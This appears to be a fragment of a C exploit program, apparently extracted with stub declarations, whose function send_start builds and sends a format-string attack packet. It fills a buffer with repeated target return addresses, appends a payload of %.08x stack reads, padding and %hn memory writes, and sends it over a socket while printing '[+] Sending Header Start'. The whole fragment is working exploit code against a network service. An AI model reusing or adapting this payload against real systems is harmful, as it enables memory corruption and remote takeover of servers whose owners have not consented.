
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {scalar_t__ ret; } ;


 int fprintf (int ,char*) ;
 char* packet_start ;
 int perror (char*) ;
 int send (int,char*,int ,int ) ;
 int stderr ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 TYPE_1__* targets ;

void send_start(int connection,int j)
{
    int i=0;
    char buf[1024];
    char *p = buf;
    strcpy(buf,packet_start);
    p += strlen(packet_start);
    while(i<10) {
        *((void **)p) = (void *) (targets[j-1].ret+6);
        p += 4;
        *((void **)p) = (void *) (targets[j-1].ret+4);
        p += 4;
        i++;
    }
    strcat(buf,"%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x    %.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.1792u%hn%hn%hn:%x%x%x%x%x%x%x%x%x%x@");

    if (send(connection,buf,strlen(buf),0)==-1) {
        perror("send");
    }
    fprintf(stderr,"[+] Sending Header Start\n");
}
